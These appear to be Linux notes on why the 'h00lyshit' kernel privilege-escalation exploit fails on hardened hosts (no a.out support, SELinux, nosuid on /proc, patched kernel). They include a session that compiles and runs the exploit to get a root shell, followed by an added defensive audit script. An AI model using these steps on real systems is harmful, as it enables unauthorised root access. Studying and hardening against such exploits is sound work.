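Overview:
1. If the kernel option CONFIG_BINFMT_AOUT is set to n, or the kernel does not support the a.out (Assembler.OUTput) format, the error "failed: Exec format error" appears.
Current distro kernels do not include a.out support; for example, the Fedora kernel:
$ cat /boot/config-2.6.14-1.1637_FC4 | grep AOUT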
# CONFIG_BINFMT_AOUT is not set
2. With SELinux enabled, the error "failed: Permission denied" results.
$ sestatus|grep SELinux&more /etc/selinux/config|grep SELINUX
SELinux status: enabled
SELINUX=enabled
3. nosuid has been added for /proc in /etc/fstab.
$ cat /etc/fstab | grep proc
proc /proc proc defaults,noexec,nosuid 0 0
4. The kernel has been patched, or its version does not match.
Linux Kernel <= 2.6.17.4
$ uname -a
Linux localhost.localdomain 2.6.13-42.ELsmp #1 SMP Sat Aug 12 09:39:11 CDT 2006 i686 i686 i386 GNU/Linux
$ cat /etc/fstab | grep proc
proc /proc proc defaults 0 0
$ sestatus|grep SELinux&more /etc/selinux/config|grep SELINUX
SELinux status: disabled
SELINUX=disabled
$ grep CONFIG_BINFMT_AOUT /boot/config-2.6.13-42.EL
CONFIG_BINFMT_AOUT=y
$ dd if=/dev/zero of=/tmp/out.tmp bs=1M count=100
$ du -sh /tmp/out.tmp
100M /tmp/out.tmp
$ gcc h00lyshit.c -o h00lyshit
$ cat /usr/lib/* >/dev/null 2>/dev/null
$ ./h00lyshit /tmp/out.tmp
preparing
trying to exploit out.tmp
# id
uid=0(root)
#
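
The four conditions listed above, turned into a host hardening audit. This is an added example, not part of the original notes; the function names and the choice to read saved `sestatus` output from a file are assumptions made for the illustration.

```sh
#!/bin/sh
# Added example: hardening audit for the four conditions in the notes above.
# Each check returns 0 when the condition holds.

aout_disabled() {       # $1 = kernel config file; true unless a.out is =y or =m
    [ -r "$1" ] && ! grep -Eq '^CONFIG_BINFMT_AOUT=[ym]' "$1"
}

selinux_enabled() {     # $1 = file holding saved `sestatus` output
    grep -Eq '^SELinux status:[[:space:]]*enabled' "$1"
}

proc_nosuid() {         # $1 = fstab file; true if /proc carries nosuid
    awk '$1 !~ /^#/ && $2 == "/proc" {
             n = split($4, opt, ",")
             for (i = 1; i <= n; i++) if (opt[i] == "nosuid") found = 1
         }
         END { exit !found }' "$1"
}

# $1 = `uname -r` string; true if newer than 2.6.17.4, the page's upper bound.
# A vendor backport does not show in the version string, so "no" is not final.
kernel_newer() {
    printf '%s\n' "${1%%-*}" | awk -F. '{
        split("2.6.17.4", ref, ".")
        for (i = 1; i <= 4; i++) {
            if (($i + 0) > (ref[i] + 0)) exit 0
            if (($i + 0) < (ref[i] + 0)) exit 1
        }
        exit 1          # exactly 2.6.17.4 is still inside the range
    }'
}

report() {              # $1 config  $2 sestatus file  $3 fstab  $4 release
    aout_disabled "$1"   && echo "a.out disabled: yes"  || echo "a.out disabled: no"
    selinux_enabled "$2" && echo "SELinux enabled: yes" || echo "SELinux enabled: no"
    proc_nosuid "$3"     && echo "/proc nosuid: yes"    || echo "/proc nosuid: no"
    kernel_newer "$4"    && echo "kernel newer: yes"    || echo "kernel newer: no"
}

sample_report() {       # constructed input mirroring the second host in the notes
    d=$(mktemp -d) || return 1
    echo 'CONFIG_BINFMT_AOUT=y'         > "$d/config"
    echo 'SELinux status: disabled'     > "$d/sestatus"
    echo 'proc /proc proc defaults 0 0' > "$d/fstab"
    report "$d/config" "$d/sestatus" "$d/fstab" '2.6.13-42.ELsmp'
    rm -rf "$d"
}

if [ "$#" -eq 4 ]; then report "$@"; else sample_report; fi
```

Four "no" lines, as the constructed sample produces, mean none of the listed conditions is in place on that host.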